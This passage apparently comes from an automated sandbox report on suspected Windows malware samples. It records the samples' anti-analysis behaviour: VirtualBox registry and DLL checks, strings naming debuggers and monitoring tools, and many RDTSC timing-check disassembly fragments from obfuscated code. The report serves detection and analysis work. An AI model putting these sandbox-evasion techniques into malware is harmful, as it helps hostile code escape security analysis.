Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: PROCMON.EXE
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: X64DBG.EXE
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXEV
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: WINDBG.EXE
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD78EF second address: CD78F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD78F5 second address: CD7902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5E8080F356h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7902 second address: CD7906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7906 second address: CD7923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F5E8080F35Eh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7923 second address: CD7929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6A6D second address: CC6A72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6A72 second address: CC6A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5E810FCBA6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CDE second address: CD6CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CE2 second address: CD6CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E810FCBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CEE second address: CD6D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jne 00007F5E8080F356h 0x0000000b jmp 00007F5E8080F35Bh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jnp 00007F5E8080F356h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6D13 second address: CD6D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBAEh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6ED2 second address: CD6ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAC97 second address: CDAC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAC9F second address: CDACA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDACA5 second address: CDACCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5E810FCBB8h 0x0000000d pushad 0x0000000e js 00007F5E810FCBA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDACCE second address: CDAD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1CD0h], esi 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D200Ch] 0x00000015 mov ch, dh 0x00000017 push C92914E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F5E8080F361h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAEC6 second address: CDAECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAECB second address: CDAED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAED1 second address: CDAF25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0F974DB7h 0x0000000f or dx, A403h 0x00000014 push 00000003h 0x00000016 and si, 19F1h 0x0000001b push 00000000h 0x0000001d call 00007F5E810FCBB5h 0x00000022 mov dx, si 0x00000025 pop edx 0x00000026 push eax 0x00000027 mov dword ptr [ebp+122D297Bh], esi 0x0000002d pop edi 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D3AA2h], ebx 0x00000036 push 87B75848h 0x0000003b jo 00007F5E810FCBB4h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAF25 second address: CDAF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAF2B second address: CDAF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 3848A7B8h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F5E810FCBA8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movzx ecx, cx 0x00000029 lea ebx, dword ptr [ebp+1244FB97h] 0x0000002f mov dword ptr [ebp+122D2B84h], ecx 0x00000035 mov ch, F2h 0x00000037 xchg eax, ebx 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5E810FCBABh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB097 second address: CDB0A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0A7 second address: CDB0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0AC second address: CDB0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007F5E8080F364h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5E8080F356h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0CF second address: CDB0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d jnc 00007F5E810FCBACh 0x00000013 js 00007F5E810FCBA6h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F5E810FCBAAh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0FC second address: CDB101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB101 second address: CDB106 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB106 second address: CDB12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jnp 00007F5E8080F356h 0x0000000e lea ebx, dword ptr [ebp+1244FBA2h] 0x00000014 add dword ptr [ebp+122D2B74h], esi 0x0000001a push eax 0x0000001b jnc 00007F5E8080F35Eh 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECDC9 second address: CECDE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F5E810FCBA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F5E810FCBA6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECDE0 second address: CECDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECDE4 second address: CECDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC34B6 second address: CC34BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA2F0 second address: CFA2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA4A4 second address: CFA4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA8F2 second address: CFA908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5E810FCBAFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA908 second address: CFA918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5E8080F356h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFAA3C second address: CFAA48 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E810FCBA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF659 second address: CFF676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F369h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF794 second address: CFF798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF798 second address: CFF7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF7A2 second address: CFF7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F5E810FCBA8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0572F second address: D05749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F364h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05DCB second address: D05DD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05DD5 second address: D05DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05DD9 second address: D05DDF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F44 second address: D05F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F63 second address: D05F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F69 second address: D05F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5E8080F35Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F79 second address: D05F96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E810FCBB8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D089D4 second address: D089E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D089E6 second address: D089EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0967A second address: D0968A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0968A second address: D09690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09728 second address: D0972C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0972C second address: D09730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09730 second address: D09736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09736 second address: D0974E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F5E810FCBA6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0974E second address: D09752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09752 second address: D09756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09BDF second address: D09C0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F5E8080F369h 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 je 00007F5E8080F356h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A0BE second address: D0A161 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F5E810FCBB8h 0x00000011 nop 0x00000012 sub esi, 0084BF8Fh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F5E810FCBA8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 pushad 0x00000035 mov bl, FCh 0x00000037 popad 0x00000038 jnl 00007F5E810FCBACh 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007F5E810FCBA8h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a call 00007F5E810FCBB4h 0x0000005f mov esi, dword ptr [ebp+122D1C24h] 0x00000065 pop edi 0x00000066 xchg eax, ebx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a push esi 0x0000006b pop esi 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A161 second address: D0A165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BE2D second address: D0BE40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E810FCBAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0AA54 second address: D0AA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5E8080F360h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E8080F360h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F9CA second address: D0F9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBADh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10004 second address: D10078 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5E8080F367h 0x00000010 nop 0x00000011 mov edi, 710ED36Ah 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1244F241h], edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F5E8080F358h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jmp 00007F5E8080F369h 0x0000003f xchg eax, ebx 0x00000040 jl 00007F5E8080F364h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D22C second address: D0D249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10078 second address: D1007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1007C second address: D10091 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F5E810FCBB2h 0x0000000d jc 00007F5E810FCBACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13438 second address: D1347B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1D20h], ecx 0x00000013 push 00000000h 0x00000015 movsx edi, bx 0x00000018 push 00000000h 0x0000001a or bl, FFFFFF98h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 jmp 00007F5E8080F360h 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D111A8 second address: D111AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14491 second address: D14497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14497 second address: D14531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F5E810FCBBBh 0x0000000c nop 0x0000000d call 00007F5E810FCBB4h 0x00000012 jmp 00007F5E810FCBB6h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a jmp 00007F5E810FCBB7h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F5E810FCBA8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov ebx, dword ptr [ebp+1244D25Bh] 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14531 second address: D14537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15393 second address: D153AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146DF second address: D146EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153AF second address: D153BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153BE second address: D153C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
